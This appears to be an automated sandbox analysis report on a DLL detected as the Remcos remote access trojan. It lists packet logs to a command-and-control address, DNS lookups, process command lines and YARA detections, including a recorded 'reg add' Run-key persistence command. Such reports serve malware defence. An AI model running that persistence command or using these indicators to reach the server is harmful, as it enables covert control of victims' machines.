                                    Oct 18, 2024 12:15:47.111715078 CEST514049907193.233.18.18192.168.2.4
                                    Oct 18, 2024 12:15:55.582130909 CEST514049907193.233.18.18192.168.2.4
                                    Oct 18, 2024 12:15:55.582225084 CEST499075140192.168.2.4193.233.18.18
                                    Oct 18, 2024 12:15:55.582304955 CEST499075140192.168.2.4193.233.18.18
                                    Oct 18, 2024 12:15:55.587188005 CEST514049907193.233.18.18192.168.2.4
                                    Oct 18, 2024 12:15:56.585982084 CEST499604050192.168.2.4193.233.18.18
                                    Oct 18, 2024 12:15:56.590914011 CEST405049960193.233.18.18192.168.2.4
                                    Oct 18, 2024 12:15:56.591001034 CEST499604050192.168.2.4193.233.18.18
                                    Oct 18, 2024 12:15:56.591357946 CEST499604050192.168.2.4193.233.18.18
                                    Oct 18, 2024 12:15:56.596154928 CEST405049960193.233.18.18192.168.2.4
                                    Oct 18, 2024 12:16:05.065956116 CEST405049960193.233.18.18192.168.2.4
                                    Oct 18, 2024 12:16:05.066050053 CEST499604050192.168.2.4193.233.18.18
                                    Oct 18, 2024 12:16:05.066108942 CEST499604050192.168.2.4193.233.18.18
                                    Oct 18, 2024 12:16:05.067178965 CEST500095140192.168.2.4193.233.18.18
                                    Oct 18, 2024 12:16:05.070957899 CEST405049960193.233.18.18192.168.2.4
                                    Oct 18, 2024 12:16:05.072201967 CEST514050009193.233.18.18192.168.2.4
                                    Oct 18, 2024 12:16:05.072277069 CEST500095140192.168.2.4193.233.18.18
                                    Oct 18, 2024 12:16:05.072729111 CEST500095140192.168.2.4193.233.18.18
                                    Oct 18, 2024 12:16:05.077513933 CEST514050009193.233.18.18192.168.2.4
                                    Oct 18, 2024 12:16:13.572762966 CEST514050009193.233.18.18192.168.2.4
                                    Oct 18, 2024 12:16:13.572841883 CEST500095140192.168.2.4193.233.18.18
                                    Oct 18, 2024 12:16:13.572913885 CEST500095140192.168.2.4193.233.18.18
                                    Oct 18, 2024 12:16:13.577709913 CEST514050009193.233.18.18192.168.2.4
                                    Oct 18, 2024 12:16:14.586256981 CEST500104050192.168.2.4193.233.18.18
                                    Oct 18, 2024 12:16:14.591219902 CEST405050010193.233.18.18192.168.2.4
                                    Oct 18, 2024 12:16:14.593264103 CEST500104050192.168.2.4193.233.18.18
                                    Oct 18, 2024 12:16:14.593568087 CEST500104050192.168.2.4193.233.18.18
                                    Oct 18, 2024 12:16:14.598366022 CEST405050010193.233.18.18192.168.2.4
                                    Oct 18, 2024 12:16:23.084474087 CEST405050010193.233.18.18192.168.2.4
                                    Oct 18, 2024 12:16:23.084712982 CEST500104050192.168.2.4193.233.18.18
                                    Oct 18, 2024 12:16:23.117341042 CEST500104050192.168.2.4193.233.18.18
                                    Oct 18, 2024 12:16:23.123466015 CEST405050010193.233.18.18192.168.2.4
                                    Oct 18, 2024 12:16:23.124727964 CEST500115140192.168.2.4193.233.18.18
                                    Oct 18, 2024 12:16:23.130455017 CEST514050011193.233.18.18192.168.2.4
                                    Oct 18, 2024 12:16:23.130544901 CEST500115140192.168.2.4193.233.18.18
                                    Oct 18, 2024 12:16:23.135020971 CEST500115140192.168.2.4193.233.18.18
                                    Oct 18, 2024 12:16:23.139837980 CEST514050011193.233.18.18192.168.2.4
                                    Oct 18, 2024 12:16:31.612761021 CEST514050011193.233.18.18192.168.2.4
                                    Oct 18, 2024 12:16:31.614483118 CEST500115140192.168.2.4193.233.18.18
                                    Oct 18, 2024 12:16:31.614483118 CEST500115140192.168.2.4193.233.18.18
                                    Oct 18, 2024 12:16:31.619286060 CEST514050011193.233.18.18192.168.2.4
                                    Oct 18, 2024 12:16:32.617994070 CEST500124050192.168.2.4193.233.18.18
                                    Oct 18, 2024 12:16:32.623073101 CEST405050012193.233.18.18192.168.2.4
                                    Oct 18, 2024 12:16:32.623133898 CEST500124050192.168.2.4193.233.18.18
                                    Oct 18, 2024 12:16:32.623414993 CEST500124050192.168.2.4193.233.18.18
                                    Oct 18, 2024 12:16:32.628247976 CEST405050012193.233.18.18192.168.2.4
                                    Oct 18, 2024 12:16:41.119478941 CEST405050012193.233.18.18192.168.2.4
                                    Oct 18, 2024 12:16:41.119541883 CEST500124050192.168.2.4193.233.18.18
                                    Oct 18, 2024 12:16:41.119601011 CEST500124050192.168.2.4193.233.18.18
                                    Oct 18, 2024 12:16:41.120765924 CEST500135140192.168.2.4193.233.18.18
                                    Oct 18, 2024 12:16:41.124586105 CEST405050012193.233.18.18192.168.2.4
                                    Oct 18, 2024 12:16:41.126000881 CEST514050013193.233.18.18192.168.2.4
                                    Oct 18, 2024 12:16:41.126072884 CEST500135140192.168.2.4193.233.18.18
                                    Oct 18, 2024 12:16:41.126552105 CEST500135140192.168.2.4193.233.18.18
                                    Oct 18, 2024 12:16:41.131628990 CEST514050013193.233.18.18192.168.2.4
                                    Oct 18, 2024 12:16:49.609514952 CEST514050013193.233.18.18192.168.2.4
                                    Oct 18, 2024 12:16:49.614615917 CEST500135140192.168.2.4193.233.18.18
                                    Oct 18, 2024 12:16:49.614762068 CEST500135140192.168.2.4193.233.18.18
                                    Oct 18, 2024 12:16:49.619721889 CEST514050013193.233.18.18192.168.2.4
                                    Oct 18, 2024 12:16:50.617837906 CEST500144050192.168.2.4193.233.18.18
                                    Oct 18, 2024 12:16:50.622848988 CEST405050014193.233.18.18192.168.2.4
                                    Oct 18, 2024 12:16:50.622992992 CEST500144050192.168.2.4193.233.18.18
                                    Oct 18, 2024 12:16:50.623193979 CEST500144050192.168.2.4193.233.18.18
                                    Oct 18, 2024 12:16:50.627960920 CEST405050014193.233.18.18192.168.2.4
                                    Oct 18, 2024 12:16:59.098603010 CEST405050014193.233.18.18192.168.2.4
                                    Oct 18, 2024 12:16:59.100693941 CEST500144050192.168.2.4193.233.18.18
                                    Oct 18, 2024 12:16:59.100733042 CEST500144050192.168.2.4193.233.18.18
                                    Oct 18, 2024 12:16:59.101931095 CEST500155140192.168.2.4193.233.18.18
                                    Oct 18, 2024 12:16:59.105689049 CEST405050014193.233.18.18192.168.2.4
                                    Oct 18, 2024 12:16:59.106848001 CEST514050015193.233.18.18192.168.2.4
                                    Oct 18, 2024 12:16:59.110692024 CEST500155140192.168.2.4193.233.18.18
                                    Oct 18, 2024 12:16:59.110986948 CEST500155140192.168.2.4193.233.18.18
                                    Oct 18, 2024 12:16:59.115830898 CEST514050015193.233.18.18192.168.2.4
                                    Oct 18, 2024 12:17:07.592542887 CEST514050015193.233.18.18192.168.2.4
                                    Oct 18, 2024 12:17:07.593070984 CEST500155140192.168.2.4193.233.18.18
                                    Oct 18, 2024 12:17:07.593070984 CEST500155140192.168.2.4193.233.18.18
                                    Oct 18, 2024 12:17:07.598042011 CEST514050015193.233.18.18192.168.2.4
                                    Oct 18, 2024 12:17:08.602261066 CEST500164050192.168.2.4193.233.18.18
                                    Oct 18, 2024 12:17:08.610181093 CEST405050016193.233.18.18192.168.2.4
                                    Oct 18, 2024 12:17:08.610255003 CEST500164050192.168.2.4193.233.18.18
                                    Oct 18, 2024 12:17:08.610567093 CEST500164050192.168.2.4193.233.18.18
                                    Oct 18, 2024 12:17:08.618133068 CEST405050016193.233.18.18192.168.2.4
                                    Oct 18, 2024 12:17:17.404012918 CEST405050016193.233.18.18192.168.2.4
                                    Oct 18, 2024 12:17:17.404221058 CEST405050016193.233.18.18192.168.2.4
                                    Oct 18, 2024 12:17:17.404330969 CEST500164050192.168.2.4193.233.18.18
                                    Oct 18, 2024 12:17:17.404330969 CEST500164050192.168.2.4193.233.18.18
                                    Oct 18, 2024 12:17:17.405445099 CEST500175140192.168.2.4193.233.18.18
                                    Oct 18, 2024 12:17:17.409250021 CEST405050016193.233.18.18192.168.2.4
                                    Oct 18, 2024 12:17:17.410295010 CEST514050017193.233.18.18192.168.2.4
                                    Oct 18, 2024 12:17:17.410381079 CEST500175140192.168.2.4193.233.18.18
                                    Oct 18, 2024 12:17:17.410635948 CEST500175140192.168.2.4193.233.18.18
                                    Oct 18, 2024 12:17:17.415479898 CEST514050017193.233.18.18192.168.2.4
                                    Oct 18, 2024 12:17:25.901875973 CEST514050017193.233.18.18192.168.2.4
                                    Oct 18, 2024 12:17:25.901945114 CEST500175140192.168.2.4193.233.18.18
                                    Oct 18, 2024 12:17:25.901990891 CEST500175140192.168.2.4193.233.18.18
                                    Oct 18, 2024 12:17:25.907067060 CEST514050017193.233.18.18192.168.2.4
                                    Oct 18, 2024 12:17:26.916516066 CEST500184050192.168.2.4193.233.18.18
                                    Oct 18, 2024 12:17:26.921716928 CEST405050018193.233.18.18192.168.2.4
                                    Oct 18, 2024 12:17:26.921782970 CEST500184050192.168.2.4193.233.18.18
                                    Oct 18, 2024 12:17:26.922101974 CEST500184050192.168.2.4193.233.18.18
                                    Oct 18, 2024 12:17:26.926901102 CEST405050018193.233.18.18192.168.2.4
                                    Oct 18, 2024 12:17:35.403600931 CEST405050018193.233.18.18192.168.2.4
                                    Oct 18, 2024 12:17:35.403731108 CEST500184050192.168.2.4193.233.18.18
                                    Oct 18, 2024 12:17:35.418040991 CEST500184050192.168.2.4193.233.18.18
                                    Oct 18, 2024 12:17:35.419444084 CEST500195140192.168.2.4193.233.18.18
                                    Oct 18, 2024 12:17:35.423122883 CEST405050018193.233.18.18192.168.2.4
                                    Oct 18, 2024 12:17:35.424388885 CEST514050019193.233.18.18192.168.2.4
                                    Oct 18, 2024 12:17:35.424469948 CEST500195140192.168.2.4193.233.18.18
                                    Oct 18, 2024 12:17:35.424734116 CEST500195140192.168.2.4193.233.18.18
                                    Oct 18, 2024 12:17:35.429631948 CEST514050019193.233.18.18192.168.2.4
                                    Oct 18, 2024 12:17:43.914722919 CEST514050019193.233.18.18192.168.2.4
                                    Oct 18, 2024 12:17:43.915101051 CEST500195140192.168.2.4193.233.18.18
                                    Oct 18, 2024 12:17:43.915149927 CEST500195140192.168.2.4193.233.18.18
                                    Oct 18, 2024 12:17:43.920150042 CEST514050019193.233.18.18192.168.2.4
                                    Oct 18, 2024 12:17:44.931226015 CEST500204050192.168.2.4193.233.18.18
                                    Oct 18, 2024 12:17:44.936105967 CEST405050020193.233.18.18192.168.2.4
                                    Oct 18, 2024 12:17:44.936175108 CEST500204050192.168.2.4193.233.18.18
                                    Oct 18, 2024 12:17:44.936419010 CEST500204050192.168.2.4193.233.18.18
                                    Oct 18, 2024 12:17:44.941219091 CEST405050020193.233.18.18192.168.2.4
                                    Oct 18, 2024 12:17:53.415916920 CEST405050020193.233.18.18192.168.2.4
                                    Oct 18, 2024 12:17:53.419328928 CEST500204050192.168.2.4193.233.18.18
                                    Oct 18, 2024 12:17:53.419329882 CEST500204050192.168.2.4193.233.18.18
                                    Oct 18, 2024 12:17:53.420334101 CEST500215140192.168.2.4193.233.18.18
                                    Oct 18, 2024 12:17:53.424460888 CEST405050020193.233.18.18192.168.2.4
                                    Oct 18, 2024 12:17:53.425164938 CEST514050021193.233.18.18192.168.2.4
                                    Oct 18, 2024 12:17:53.425267935 CEST500215140192.168.2.4193.233.18.18
                                    Oct 18, 2024 12:17:53.425585985 CEST500215140192.168.2.4193.233.18.18
                                    Oct 18, 2024 12:17:53.430438042 CEST514050021193.233.18.18192.168.2.4
                                    Oct 18, 2024 12:18:01.910669088 CEST514050021193.233.18.18192.168.2.4
                                    Oct 18, 2024 12:18:01.910856009 CEST500215140192.168.2.4193.233.18.18
                                    Oct 18, 2024 12:18:01.910856009 CEST500215140192.168.2.4193.233.18.18
                                    Oct 18, 2024 12:18:01.915785074 CEST514050021193.233.18.18192.168.2.4
                                    Oct 18, 2024 12:18:02.916215897 CEST500224050192.168.2.4193.233.18.18
                                    Oct 18, 2024 12:18:02.921124935 CEST405050022193.233.18.18192.168.2.4
                                    Oct 18, 2024 12:18:02.923278093 CEST500224050192.168.2.4193.233.18.18
                                    Oct 18, 2024 12:18:02.923600912 CEST500224050192.168.2.4193.233.18.18
                                    Oct 18, 2024 12:18:02.928633928 CEST405050022193.233.18.18192.168.2.4
                                    Oct 18, 2024 12:18:11.419096947 CEST405050022193.233.18.18192.168.2.4
                                    Oct 18, 2024 12:18:11.419197083 CEST500224050192.168.2.4193.233.18.18
                                    Oct 18, 2024 12:18:11.419328928 CEST500224050192.168.2.4193.233.18.18
                                    Oct 18, 2024 12:18:11.420262098 CEST500235140192.168.2.4193.233.18.18
                                    Oct 18, 2024 12:18:11.424334049 CEST405050022193.233.18.18192.168.2.4
                                    Oct 18, 2024 12:18:11.425265074 CEST514050023193.233.18.18192.168.2.4
                                    Oct 18, 2024 12:18:11.425365925 CEST500235140192.168.2.4193.233.18.18
                                    Oct 18, 2024 12:18:11.425822020 CEST500235140192.168.2.4193.233.18.18
                                    Oct 18, 2024 12:18:11.430813074 CEST514050023193.233.18.18192.168.2.4
                                    Oct 18, 2024 12:18:19.985167027 CEST514050023193.233.18.18192.168.2.4
                                    Oct 18, 2024 12:18:19.985475063 CEST500235140192.168.2.4193.233.18.18
                                    Oct 18, 2024 12:18:19.985534906 CEST500235140192.168.2.4193.233.18.18
                                    Oct 18, 2024 12:18:19.990514994 CEST514050023193.233.18.18192.168.2.4
                                    Oct 18, 2024 12:18:20.993756056 CEST500244050192.168.2.4193.233.18.18
                                    Oct 18, 2024 12:18:20.999509096 CEST405050024193.233.18.18192.168.2.4
                                    Oct 18, 2024 12:18:20.999735117 CEST500244050192.168.2.4193.233.18.18
                                    Oct 18, 2024 12:18:21.003691912 CEST500244050192.168.2.4193.233.18.18
                                    Oct 18, 2024 12:18:21.008743048 CEST405050024193.233.18.18192.168.2.4

                                    UDP Packets

                                    TimestampSource PortDest PortSource IPDest IP
                                    Oct 18, 2024 12:15:02.431050062 CEST6101053192.168.2.41.1.1.1
                                    Oct 18, 2024 12:15:02.487327099 CEST53610101.1.1.1192.168.2.4
                                    Oct 18, 2024 12:15:11.070998907 CEST5156253192.168.2.41.1.1.1
                                    Oct 18, 2024 12:15:11.090673923 CEST53515621.1.1.1192.168.2.4

                                    DNS Queries

                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                    Oct 18, 2024 12:15:02.431050062 CEST192.168.2.41.1.1.10x57aStandard query (0)goatratedman.comA (IP address)IN (0x0001)false
                                    Oct 18, 2024 12:15:11.070998907 CEST192.168.2.41.1.1.10x9c5aStandard query (0)extendedbreakfast.comA (IP address)IN (0x0001)false

                                    DNS Answers

                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                    Oct 18, 2024 12:15:02.487327099 CEST1.1.1.1192.168.2.40x57aNo error (0)goatratedman.com193.233.18.18A (IP address)IN (0x0001)false
                                    Oct 18, 2024 12:15:11.090673923 CEST1.1.1.1192.168.2.40x9c5aNo error (0)extendedbreakfast.com193.233.18.18A (IP address)IN (0x0001)false

                                    Statistics

                                    CPU Usage

                                    Click to jump to process

                                    Memory Usage

                                    Click to jump to process

                                    High Level Behavior Distribution

                                    Click to dive into process behavior distribution

                                    Behavior

                                    Click to jump to process

                                    System Behavior

                                    General

                                    Target ID:0
                                    Start time:06:14:14
                                    Start date:18/10/2024
                                    Path:C:\Windows\System32\loaddll32.exe
                                    Wow64 process (32bit):true
                                    Commandline:loaddll32.exe "C:\Users\user\Desktop\7P7cuKWTfN.dll"
                                    Imagebase:0x7c0000
                                    File size:126'464 bytes
                                    MD5 hash:51E6071F9CBA48E79F10C84515AAE618
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000000.00000002.2245664796.0000000010EC8000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.2245664796.0000000010EC8000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                    • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000000.00000002.2245664796.0000000010EC8000.00000040.00000001.01000000.00000003.sdmp, Author: unknown
                                    Reputation:high
                                    Has exited:true

                                    General

                                    Target ID:1
                                    Start time:06:14:14
                                    Start date:18/10/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff7699e0000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    General

                                    Target ID:2
                                    Start time:06:14:14
                                    Start date:18/10/2024
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):true
                                    Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\7P7cuKWTfN.dll",#1
                                    Imagebase:0x240000
                                    File size:236'544 bytes
                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    General

                                    Target ID:3
                                    Start time:06:14:14
                                    Start date:18/10/2024
                                    Path:C:\Windows\SysWOW64\regsvr32.exe
                                    Wow64 process (32bit):true
                                    Commandline:regsvr32.exe /s C:\Users\user\Desktop\7P7cuKWTfN.dll
                                    Imagebase:0x330000
                                    File size:20'992 bytes
                                    MD5 hash:878E47C8656E53AE8A8A21E927C6F7E0
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000003.00000002.2232792548.0000000010EC8000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000003.00000002.2232792548.0000000010EC8000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                    • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000003.00000002.2232792548.0000000010EC8000.00000040.00000001.01000000.00000003.sdmp, Author: unknown
                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000003.00000002.2209821177.0000000005990000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000003.00000002.2209821177.0000000005990000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000003.00000002.2209821177.0000000005990000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                    • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000003.00000002.2209821177.0000000005990000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                    • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000003.00000002.2209821177.0000000005990000.00000040.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                    Reputation:high
                                    Has exited:true

                                    General

                                    Target ID:4
                                    Start time:06:14:14
                                    Start date:18/10/2024
                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                    Wow64 process (32bit):true
                                    Commandline:rundll32.exe "C:\Users\user\Desktop\7P7cuKWTfN.dll",#1
                                    Imagebase:0xa20000
                                    File size:61'440 bytes
                                    MD5 hash:889B99C52A60DD49227C5E485A016679
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000004.00000002.2230948357.0000000010EC8000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000004.00000002.2230948357.0000000010EC8000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                    • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000004.00000002.2230948357.0000000010EC8000.00000040.00000001.01000000.00000003.sdmp, Author: unknown
                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000004.00000002.2183813294.0000000004DF0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000004.00000002.2183813294.0000000004DF0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000004.00000002.2183813294.0000000004DF0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                    • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000004.00000002.2183813294.0000000004DF0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                    • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000004.00000002.2183813294.0000000004DF0000.00000040.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                    Reputation:high
                                    Has exited:true

                                    General

                                    Target ID:5
                                    Start time:06:14:15
                                    Start date:18/10/2024
                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                    Wow64 process (32bit):true
                                    Commandline:rundll32.exe C:\Users\user\Desktop\7P7cuKWTfN.dll,DllCanUnloadNow
                                    Imagebase:0xa20000
                                    File size:61'440 bytes
                                    MD5 hash:889B99C52A60DD49227C5E485A016679
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000005.00000002.2229503398.0000000004E10000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000005.00000002.2229503398.0000000004E10000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000005.00000002.2229503398.0000000004E10000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                    • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000005.00000002.2229503398.0000000004E10000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                    • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000005.00000002.2229503398.0000000004E10000.00000040.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000005.00000002.2242971963.0000000010EC8000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000005.00000002.2242971963.0000000010EC8000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                    • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000005.00000002.2242971963.0000000010EC8000.00000040.00000001.01000000.00000003.sdmp, Author: unknown
                                    Reputation:high
                                    Has exited:true

                                    General

                                    Target ID:6
                                    Start time:06:14:18
                                    Start date:18/10/2024
                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                    Wow64 process (32bit):true
                                    Commandline:rundll32.exe C:\Users\user\Desktop\7P7cuKWTfN.dll,DllGetClassObject
                                    Imagebase:0xa20000
                                    File size:61'440 bytes
                                    MD5 hash:889B99C52A60DD49227C5E485A016679
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000006.00000002.2212028354.0000000005330000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000006.00000002.2212028354.0000000005330000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000006.00000002.2212028354.0000000005330000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                    • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000006.00000002.2212028354.0000000005330000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                    • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000006.00000002.2212028354.0000000005330000.00000040.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000006.00000002.2231320155.0000000010EC8000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000006.00000002.2231320155.0000000010EC8000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                    • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000006.00000002.2231320155.0000000010EC8000.00000040.00000001.01000000.00000003.sdmp, Author: unknown
                                    Reputation:high
                                    Has exited:true

                                    General

                                    Target ID:7
                                    Start time:06:14:21
                                    Start date:18/10/2024
                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                    Wow64 process (32bit):true
                                    Commandline:rundll32.exe C:\Users\user\Desktop\7P7cuKWTfN.dll,DllRegisterServer
                                    Imagebase:0xa20000
                                    File size:61'440 bytes
                                    MD5 hash:889B99C52A60DD49227C5E485A016679
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000007.00000002.2243597399.0000000010EC8000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000007.00000002.2243597399.0000000010EC8000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                    • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000007.00000002.2243597399.0000000010EC8000.00000040.00000001.01000000.00000003.sdmp, Author: unknown
                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000007.00000002.2230248176.0000000004830000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000007.00000002.2230248176.0000000004830000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000007.00000002.2230248176.0000000004830000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                    • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000007.00000002.2230248176.0000000004830000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                    • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000007.00000002.2230248176.0000000004830000.00000040.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                    Reputation:high
                                    Has exited:true

                                    General

                                    Target ID:11
                                    Start time:06:15:00
                                    Start date:18/10/2024
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):true
                                    Commandline:cmd.exe /C reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "*Chrome" /t REG_SZ /d "rundll32.exe C:\Users\user\AppData\Roaming\VIVA_01.dll",EntryPoint /f & exit
                                    Imagebase:0x240000
                                    File size:236'544 bytes
                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    General

                                    Target ID:12
                                    Start time:06:15:01
                                    Start date:18/10/2024
                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Windows\SysWOW64\rundll32.exe"
                                    Imagebase:0xa20000
                                    File size:61'440 bytes
                                    MD5 hash:889B99C52A60DD49227C5E485A016679
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000C.00000002.4190687497.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                    • Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
